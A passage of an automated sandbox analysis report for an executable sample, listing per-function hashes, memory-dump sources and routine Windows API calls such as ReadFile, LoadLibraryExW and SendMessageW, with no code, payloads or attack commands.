                    • Opcode Fuzzy Hash: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                    • Instruction Fuzzy Hash: 9031E7B0B001159BC71CDF0AE484A6AF7E5FB49300BA48696E40ACB356D635EDC1DB89
                    APIs
                    Memory Dump Source
                    • Source File: 00000000.00000002.2061522397.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.2061500145.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2061582798.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2061582798.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2061644697.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2061664234.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2061733214.0000000000523000.00000080.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2061790179.000000000052A000.00000040.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_UaOJAOMxcU.jbxd
                    Similarity
                    • API ID: ClearVariant
                    • String ID:
                    • API String ID: 1473721057-0
                    • Opcode ID: e5b39714ab5e060571701c2fd87f9e8eca858aac3ab78beea71fa84ca8624b4f
                    • Instruction ID: 88ec2210b97eaeb66bd16e67604d6e353b3070822350be419431805434595ad1
                    • Opcode Fuzzy Hash: e5b39714ab5e060571701c2fd87f9e8eca858aac3ab78beea71fa84ca8624b4f
                    • Instruction Fuzzy Hash: 24414C746083419FDB14DF14C444B1ABBE1BF45318F0988ADE8999B362C739EC45CF4A
                    APIs
                    Memory Dump Source
                    • Source File: 00000000.00000002.2061522397.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.2061500145.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2061582798.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2061582798.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2061644697.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2061664234.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2061733214.0000000000523000.00000080.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2061790179.000000000052A000.00000040.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_UaOJAOMxcU.jbxd
                    Similarity
                    • API ID: _memmove
                    • String ID:
                    • API String ID: 4104443479-0
                    • Opcode ID: 96c929bf77b3b37bef83dc6561b6447fdcd5197876a84e0889d6f1de037c7794
                    • Instruction ID: 5aee7fa9bcd607eba38c972a5a3afb297840d704fa760c95cbb8f93a96c2956d
                    • Opcode Fuzzy Hash: 96c929bf77b3b37bef83dc6561b6447fdcd5197876a84e0889d6f1de037c7794
                    • Instruction Fuzzy Hash: 2821D471910A08EBCB009F52F84076A7BB8FB09310F21957BE485D5151DB7494D0D74E
                    APIs
                      • Part of subcall function 00404BB5: FreeLibrary.KERNEL32(00000000,?), ref: 00404BEF
                      • Part of subcall function 0042525B: __wfsopen.LIBCMT ref: 00425266
                    • LoadLibraryExW.KERNEL32(?,00000000,00000002,?,004C52F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 00404E0F
                      • Part of subcall function 00404B6A: FreeLibrary.KERNEL32(00000000), ref: 00404BA4
                      • Part of subcall function 00404C70: _memmove.LIBCMT ref: 00404CBA
                    Memory Dump Source
                    • Source File: 00000000.00000002.2061522397.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.2061500145.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2061582798.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2061582798.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2061644697.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2061664234.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2061733214.0000000000523000.00000080.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2061790179.000000000052A000.00000040.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_UaOJAOMxcU.jbxd
                    Similarity
                    • API ID: Library$Free$Load__wfsopen_memmove
                    • String ID:
                    • API String ID: 1396898556-0
                    • Opcode ID: 38ec5427debe44dbaf010247b0005924d02b12c3bdd9824270641944ab0405bf
                    • Instruction ID: 9236aa628d2d192556c2689c07174e5c913df1e85eea92ba98d954e2704214a9
                    • Opcode Fuzzy Hash: 38ec5427debe44dbaf010247b0005924d02b12c3bdd9824270641944ab0405bf
                    • Instruction Fuzzy Hash: 8511C471600205ABCF14BF71C812FAE77A8AFC4718F10883FF641B71C1DA79AA059B99
                    APIs
                    Memory Dump Source
                    • Source File: 00000000.00000002.2061522397.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.2061500145.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2061582798.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2061582798.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2061644697.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2061664234.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2061733214.0000000000523000.00000080.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2061790179.000000000052A000.00000040.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_UaOJAOMxcU.jbxd
                    Similarity
                    • API ID: _memmove
                    • String ID:
                    • API String ID: 4104443479-0
                    • Opcode ID: 47647f3d04b386c0c2150db9e578cdfe8af40bf34edb4e6fd3868b4b8a472812
                    • Instruction ID: 95ef85ecf4a985c53e38b6b1237abcb75d3ed32973377874be14757091495c4e
                    • Opcode Fuzzy Hash: 47647f3d04b386c0c2150db9e578cdfe8af40bf34edb4e6fd3868b4b8a472812
                    • Instruction Fuzzy Hash: 2B112C756046029FC724DF29D541916B7E9EF49314B20882EE48ACB362DB36E841CB55
                    APIs
                    Memory Dump Source
                    • Source File: 00000000.00000002.2061522397.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.2061500145.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2061582798.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2061582798.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2061644697.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2061664234.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2061733214.0000000000523000.00000080.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2061790179.000000000052A000.00000040.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_UaOJAOMxcU.jbxd
                    Similarity
                    • API ID: ClearVariant
                    • String ID:
                    • API String ID: 1473721057-0
                    • Opcode ID: a1d7634cef20e89a43ea3a6aa410385a639ea596468638af103cd2be2e177d45
                    • Instruction ID: 88ab595809d02070da327240463ca908ecab152c49247d70464b3f23f3751fdf
                    • Opcode Fuzzy Hash: a1d7634cef20e89a43ea3a6aa410385a639ea596468638af103cd2be2e177d45
                    • Instruction Fuzzy Hash: 4C214874508301DFDB14DF24C444A1ABBE1BF88314F05886DF88957762C739E815CB9B
                    APIs
                    • ReadFile.KERNEL32(?,?,00010000,?,00000000,00000000,?,00010000,?,004056A7,00000000,00010000,00000000,00000000,00000000,00000000), ref: 00405C16
                    Memory Dump Source
                    • Source File: 00000000.00000002.2061522397.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.2061500145.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2061582798.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2061582798.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2061644697.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2061664234.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2061733214.0000000000523000.00000080.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2061790179.000000000052A000.00000040.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_UaOJAOMxcU.jbxd
                    Similarity
                    • API ID: FileRead
                    • String ID:
                    • API String ID: 2738559852-0
                    • Opcode ID: 004768512cec5bb2a12ad018666046467aa459102812d405fbf65d0c4fac9fff
                    • Instruction ID: 772d3f2de97e4a3295a634e8ff1b07ab9ba467494f4d4c1bb2e9b048b5294e56
                    • Opcode Fuzzy Hash: 004768512cec5bb2a12ad018666046467aa459102812d405fbf65d0c4fac9fff
                    • Instruction Fuzzy Hash: C5112831204B049FE3208F19C880B67B7F8EB44764F10C92EE9AA96A91D774F845CF64
                    APIs
                    Memory Dump Source
                    • Source File: 00000000.00000002.2061522397.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.2061500145.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2061582798.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2061582798.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2061644697.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2061664234.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2061733214.0000000000523000.00000080.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2061790179.000000000052A000.00000040.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_UaOJAOMxcU.jbxd
                    Similarity
                    • API ID: _memmove
                    • String ID:
                    • API String ID: 4104443479-0
                    • Opcode ID: a7b9d5836668f83c2a3f51eb8053bbd8b90c3f0a49dd782c3ce1182c41f61193
                    • Instruction ID: b26529ee9b914c12feaffd8856b12b4ff76ce3a38eeed91d3c5b717ccaf7fb48
                    • Opcode Fuzzy Hash: a7b9d5836668f83c2a3f51eb8053bbd8b90c3f0a49dd782c3ce1182c41f61193
                    • Instruction Fuzzy Hash: 7E01DFB9300902AFC301EB29D441D26F7A9FF8A314714812EE818C7702DB38EC21CBE4
                    APIs
                    Memory Dump Source
                    • Source File: 00000000.00000002.2061522397.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.2061500145.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2061582798.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2061582798.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2061644697.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2061664234.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2061733214.0000000000523000.00000080.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2061790179.000000000052A000.00000040.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_UaOJAOMxcU.jbxd
                    Similarity
                    • API ID: _memmove
                    • String ID:
                    • API String ID: 4104443479-0
                    • Opcode ID: 9c32f161398eb4bd7e122dfe5082f696bb269761549320fc01a7a53078dc7b67
                    • Instruction ID: 8ac4692a4edd8b950221785d74b091900f33ceedfbe0b692f8040025a9c6a4da
                    • Opcode Fuzzy Hash: 9c32f161398eb4bd7e122dfe5082f696bb269761549320fc01a7a53078dc7b67
                    • Instruction Fuzzy Hash: E90126B26013016EC3209F29D806FA7BBD4AB04360F10853FF61ACA1D1EA79F84087D8
                    APIs
                    Memory Dump Source
                    • Source File: 00000000.00000002.2062108928.0000000000AE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00AE0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_ae0000_UaOJAOMxcU.jbxd
                    Similarity
                    • API ID: FilePointer
                    • String ID:
                    • API String ID: 973152223-0
                    • Opcode ID: ad76dab04f2f54abdb2e3571ea1dc09999a209a42157367896a55cadce46be18
                    • Instruction ID: 0418ca6a570d9a8215c129544c9ff2dc03d6f413d78be1ca0089e14832ea6f7a
                    • Opcode Fuzzy Hash: ad76dab04f2f54abdb2e3571ea1dc09999a209a42157367896a55cadce46be18
                    • Instruction Fuzzy Hash: 12018071C0D3D09FC7268B3794142767BB46B777A4F098E9AA0859B1A2D6709C04D752
                    APIs
                    • __lock_file.LIBCMT ref: 004248A6
                      • Part of subcall function 00428B28: __getptd_noexit.LIBCMT ref: 00428B28
                    Memory Dump Source
                    • Source File: 00000000.00000002.2061522397.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.2061500145.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2061582798.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2061582798.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2061644697.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2061664234.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2061733214.0000000000523000.00000080.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2061790179.000000000052A000.00000040.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_UaOJAOMxcU.jbxd
                    Similarity
                    • API ID: __getptd_noexit__lock_file
                    • String ID:
                    • API String ID: 2597487223-0
                    • Opcode ID: 067e945b42619cd5e532bb4c940c68e511b21f2bac583ba92795690b8c8a8ee6
                    • Instruction ID: a5fe8b5ebddeabdc03b7defa85b5706b3c04092d14be9d7edba4dc341e0ab760
                    • Opcode Fuzzy Hash: 067e945b42619cd5e532bb4c940c68e511b21f2bac583ba92795690b8c8a8ee6
                    • Instruction Fuzzy Hash: B4F0F431B11224EBDF11BFB2AC053AE36A0EF41328F91440EF42096281DB7C8951DB5D
                    APIs
                    • FreeLibrary.KERNEL32(?,?,004C52F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 00404E7E
                    Memory Dump Source
                    • Source File: 00000000.00000002.2061522397.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.2061500145.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2061582798.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2061582798.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2061644697.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2061664234.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2061733214.0000000000523000.00000080.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2061790179.000000000052A000.00000040.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_UaOJAOMxcU.jbxd
                    Similarity
                    • API ID: FreeLibrary
                    • String ID:
                    • API String ID: 3664257935-0
                    • Opcode ID: 5e403c8a90df1ee0e06371f2d57000cd02bd76b5d635224a6d232ab0319aed21
                    • Instruction ID: e65952a518aebd30c2be6c87fe4ab6250acd6cacf129c027b051fb699af34d37
                    • Opcode Fuzzy Hash: 5e403c8a90df1ee0e06371f2d57000cd02bd76b5d635224a6d232ab0319aed21
                    • Instruction Fuzzy Hash: 85F01CB1501711CFCB349F64E494817B7E1BF94369320893FE2D692650C7359844DB84
                    APIs
                    • GetLongPathNameW.KERNEL32(?,?,00007FFF), ref: 004207B0
                      • Part of subcall function 00407BCC: _memmove.LIBCMT ref: 00407C06
                    Memory Dump Source
                    • Source File: 00000000.00000002.2061522397.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.2061500145.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2061582798.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2061582798.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2061644697.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2061664234.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2061733214.0000000000523000.00000080.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2061790179.000000000052A000.00000040.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_UaOJAOMxcU.jbxd
                    Similarity
                    • API ID: LongNamePath_memmove
                    • String ID:
                    • API String ID: 2514874351-0
                    • Opcode ID: 5311bc10bcd02c3da6376a961da6fa5eeea3c1e89524b7fc1d9ecfef85fbf38f
                    • Instruction ID: 9246c12fdc37fcd41ca4db90d4c6e7f6585ba1f285f6c4ea688713946de2f6cd
                    • Opcode Fuzzy Hash: 5311bc10bcd02c3da6376a961da6fa5eeea3c1e89524b7fc1d9ecfef85fbf38f
                    • Instruction Fuzzy Hash: F5E0263290012817C720E2599C05FEA77ACDF882A0F0401BAFC0CD3204D964AC808694
                    APIs
                    Memory Dump Source
                    • Source File: 00000000.00000002.2061522397.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.2061500145.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2061582798.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2061582798.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2061644697.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2061664234.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2061733214.0000000000523000.00000080.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2061790179.000000000052A000.00000040.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_UaOJAOMxcU.jbxd
                    Similarity
                    • API ID: __fread_nolock
                    • String ID:
                    • API String ID: 2638373210-0
                    • Opcode ID: 36e66934677415102e9643fee0822ecf6e22e0db5db5ed1a6e3653ba213ae753
                    • Instruction ID: 3b5d1e22e3b7b83ea6e308f8ce2403907d65c91d4ff9c09852f69d04d9ef645c
                    • Opcode Fuzzy Hash: 36e66934677415102e9643fee0822ecf6e22e0db5db5ed1a6e3653ba213ae753
                    • Instruction Fuzzy Hash: BDE092B0204B005BD7388A24D800BA373E1AB05304F00091EF2AAC3341EB67B841C75D
                    APIs
                    • SetFilePointerEx.KERNEL32(?,00000000,00000000,?,00000001,?,?,?,0043DD42,?,?,00000000), ref: 00405C5F
                    Memory Dump Source
                    • Source File: 00000000.00000002.2061522397.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.2061500145.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2061582798.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2061582798.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2061644697.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2061664234.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2061733214.0000000000523000.00000080.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2061790179.000000000052A000.00000040.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_UaOJAOMxcU.jbxd
                    Similarity
                    • API ID: FilePointer
                    • String ID:
                    • API String ID: 973152223-0
                    • Opcode ID: 14cfb4b96d04a2f7cb021406aaf56b6dbb63ecfee093867407aa16a4735cb87b
                    • Instruction ID: 2996e6a09d4b0f83628727b5f35a7304175fa4664712b8752db8e98aaff89e7d
                    • Opcode Fuzzy Hash: 14cfb4b96d04a2f7cb021406aaf56b6dbb63ecfee093867407aa16a4735cb87b
                    • Instruction Fuzzy Hash: 75D0C77464020CBFE710DB80DC46FAD777CD705710F200194FD0456290D6B27D548795
                    APIs
                    Memory Dump Source
                    • Source File: 00000000.00000002.2061522397.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.2061500145.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2061582798.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2061582798.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2061644697.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2061664234.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2061733214.0000000000523000.00000080.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2061790179.000000000052A000.00000040.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_UaOJAOMxcU.jbxd
                    Similarity
                    • API ID: __wfsopen
                    • String ID:
                    • API String ID: 197181222-0
                    • Opcode ID: 6ddf6e1ab81d7b85eaff3423c11cf18e9f26fa56f97d638f5b10e7f164e3c6f3
                    • Instruction ID: 26467e9723955137fe9c45439b6ceb4f873de5a2d7ef111d81715968119f48b2
                    • Opcode Fuzzy Hash: 6ddf6e1ab81d7b85eaff3423c11cf18e9f26fa56f97d638f5b10e7f164e3c6f3
                    • Instruction Fuzzy Hash: 99B0927654020CB7CE012A82FC02A593B199B41768F8080A1FB0C181A2A677A6649A99
                    APIs
                    • GetLastError.KERNEL32(00000002,00000000), ref: 0046D1FF
                    Memory Dump Source
                    • Source File: 00000000.00000002.2061522397.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.2061500145.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2061582798.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2061582798.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2061644697.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2061664234.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2061733214.0000000000523000.00000080.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2061790179.000000000052A000.00000040.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_UaOJAOMxcU.jbxd
                    Similarity
                    • API ID: ErrorLast
                    • String ID:
                    • API String ID: 1452528299-0
                    • Opcode ID: a922e54199d856f66316b9f49874a2140691105f4103837f0a19e123fae390fb
                    • Instruction ID: fca64642930eea01f473371421ac76cd1d6e5c7f539a83d07f9f97c05c5cdcbf
                    • Opcode Fuzzy Hash: a922e54199d856f66316b9f49874a2140691105f4103837f0a19e123fae390fb
                    • Instruction Fuzzy Hash: 9D717674A043018FC704EF65C491A6AB7E0EF85318F04496EF996973A2DB38ED45CB5B
                    APIs
                    Memory Dump Source
                    • Source File: 00000000.00000002.2062769106.0000000000C2D000.00000040.00000020.00020000.00000000.sdmp, Offset: 00C2D000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_c2d000_UaOJAOMxcU.jbxd
                    Similarity
                    • API ID: Sleep
                    • String ID:
                    • API String ID: 3472027048-0
                    • Opcode ID: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
                    • Instruction ID: e7a0769bde9bc132662b8be23590f0f78694cbe62c0b386666ebb0e8b3a18e39
                    • Opcode Fuzzy Hash: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
                    • Instruction Fuzzy Hash: BBE0E67494010EDFDB00EFB8D5496DE7FB4EF04301F100565FD01D2281D6309D509A62
                    APIs
                      • Part of subcall function 00402612: GetWindowLongW.USER32(?,000000EB), ref: 00402623
                    • DefDlgProcW.USER32(?,0000004E,?,?,?,?,?,?), ref: 0048CB37
                    • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 0048CB95
                    • GetWindowLongW.USER32(?,000000F0), ref: 0048CBD6
                    • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 0048CC00
                    • SendMessageW.USER32 ref: 0048CC29
                    • _wcsncpy.LIBCMT ref: 0048CC95
                    • GetKeyState.USER32(00000011), ref: 0048CCB6
                    • GetKeyState.USER32(00000009), ref: 0048CCC3
                    • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 0048CCD9
                    • GetKeyState.USER32(00000010), ref: 0048CCE3
                    • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 0048CD0C
                    • SendMessageW.USER32 ref: 0048CD33
                    • SendMessageW.USER32(?,00001030,?,0048B348), ref: 0048CE37
                    • ImageList_SetDragCursorImage.COMCTL32(00000000,00000000,00000000,?,?,?), ref: 0048CE4D
                    • ImageList_BeginDrag.COMCTL32(00000000,000000F8,000000F0), ref: 0048CE60
                    • SetCapture.USER32(?), ref: 0048CE69
                    • ClientToScreen.USER32(?,?), ref: 0048CECE
                    • ImageList_DragEnter.COMCTL32(00000000,?,?), ref: 0048CEDB
                    • InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 0048CEF5
                    • ReleaseCapture.USER32 ref: 0048CF00
                    • GetCursorPos.USER32(?), ref: 0048CF3A
                    • ScreenToClient.USER32(?,?), ref: 0048CF47
                    • SendMessageW.USER32(?,00001012,00000000,?), ref: 0048CFA3
                    • SendMessageW.USER32 ref: 0048CFD1
                    • SendMessageW.USER32(?,00001111,00000000,?), ref: 0048D00E
                    • SendMessageW.USER32 ref: 0048D03D
                    • SendMessageW.USER32(?,0000110B,00000009,00000000), ref: 0048D05E
                    • SendMessageW.USER32(?,0000110B,00000009,?), ref: 0048D06D
                    • GetCursorPos.USER32(?), ref: 0048D08D
                    • ScreenToClient.USER32(?,?), ref: 0048D09A
                    • GetParent.USER32(?), ref: 0048D0BA
                    • SendMessageW.USER32(?,00001012,00000000,?), ref: 0048D123
                    • SendMessageW.USER32 ref: 0048D154
                    • ClientToScreen.USER32(?,?), ref: 0048D1B2
                    • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000), ref: 0048D1E2
                    • SendMessageW.USER32(?,00001111,00000000,?), ref: 0048D20C
                    • SendMessageW.USER32 ref: 0048D22F
                    • ClientToScreen.USER32(?,?), ref: 0048D281
                    • TrackPopupMenuEx.USER32(?,00000080,?,?,?,00000000), ref: 0048D2B5
                      • Part of subcall function 004025DB: GetWindowLongW.USER32(?,000000EB), ref: 004025EC
                    • GetWindowLongW.USER32(?,000000F0), ref: 0048D351
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2061522397.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.2061500145.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2061582798.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2061582798.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2061644697.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2061664234.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2061733214.0000000000523000.00000080.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2061790179.000000000052A000.00000040.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_UaOJAOMxcU.jbxd
                    Similarity
